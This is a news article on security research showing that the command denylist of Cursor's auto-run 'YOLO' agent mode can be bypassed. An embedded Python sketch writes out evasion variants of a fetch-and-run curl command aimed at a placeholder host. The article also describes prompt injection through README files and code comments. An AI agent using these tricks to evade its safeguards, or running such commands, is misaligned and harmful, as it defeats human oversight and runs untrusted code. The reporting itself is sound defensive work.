

AI-powered programming tools are rapidly gaining popularity, and one of the most prominent—Cursor—has introduced a new YOLO mode (short for “you only live once”) that enables its agent to execute complex sequences of actions without requiring user confirmation at each step. However, Israeli cybersecurity firm Backslash Security has sounded the alarm: this seemingly convenient feature could lead not merely to errors, but to catastrophic consequences, including file deletion and the execution of arbitrary commands.

YOLO mode executes commands automatically, sharply reducing human oversight. Cursor reportedly incorporates safety mechanisms such as allowlists, denylists, and an explicit toggle to prohibit file deletion. While these protections appear robust on paper, security experts have discovered that in practice they are easily circumvented.

Backslash identified four distinct techniques for bypassing these restrictions: command obfuscation, execution within subshells, writing scripts to disk and then running them, and manipulating quotation marks in bash to evade filters. Even if a command such as curl is on the denylist, Cursor can still execute it if it is encoded in Base64 or wrapped in another shell. Such workarounds render attempts to constrain the agent’s behavior virtually futile.
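To illustrate why filters of this kind are fragile, here is a minimal Python sketch. It is not Cursor's actual implementation, which the report does not describe in detail. The `DENYLIST` set, the `naive_is_allowed` function, and the example URL are all hypothetical, and the filter is assumed to match whole whitespace-separated tokens. The script only inspects strings and never executes any of them.

```python
import base64

# Hypothetical denylist; an assumption for illustration only.
DENYLIST = {"curl", "rm"}


def naive_is_allowed(command: str) -> bool:
    """Allow a command unless one of its whitespace-separated tokens
    exactly matches a denylisted name (an assumed, simplistic filter)."""
    return not any(token in DENYLIST for token in command.split())


# The command the denylist is meant to stop (placeholder URL).
payload = "curl http://example.com/install.sh"
encoded = base64.b64encode(payload.encode()).decode()

# One variant per bypass technique named in the article.
variants = {
    "plain": payload,
    # Obfuscation: the filter sees only an opaque Base64 string.
    "base64": f"echo {encoded} | base64 -d | sh",
    # Subshell: the denylisted name is hidden inside a quoted argument.
    "subshell": f'sh -c "{payload}"',
    # Script on disk: the command is written to a file, then the file is run.
    "script": f"echo '{payload}' > /tmp/x.sh && sh /tmp/x.sh",
    # Quote manipulation: bash joins c""url into curl before running it.
    "quotes": 'c""url http://example.com/install.sh',
}

# Record which variants the naive filter would let through.
results = {name: naive_is_allowed(cmd) for name, cmd in variants.items()}

for name, allowed in results.items():
    print(f"{name:9s} allowed={allowed}")
```

Under these assumptions, only the plain form is rejected, while every rewritten form passes the check even though a shell would end up running the same command. A stricter filter could catch some of these variants, but each new rule invites another rewrite, which is the core weakness of the denylist approach.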

Developers may unwittingly expose themselves to danger by importing instructions for Cursor from unverified GitHub repositories. These files often contain behavioral templates for the agent, but nothing prevents them from embedding malicious code. Alarmingly, even a simple comment in the source code or a line in a README file could serve as an attack vector—if it contains a specially crafted fragment that the agent interprets as an executable instruction.

According to Backslash, these vulnerabilities also invalidate any reliance on the file deletion safeguard in YOLO mode. Once the agent gains the ability to execute malicious code, no amount of checkboxes will restrain its actions.

Cursor has yet to issue an official response. However, the research team reports that the company plans to abandon the ineffective denylist approach in its upcoming version 1.3, which had not been released at the time of the study’s publication. Until then, developers are advised to forgo illusions of protection and think twice before entrusting an unsupervised AI with access to real-world code.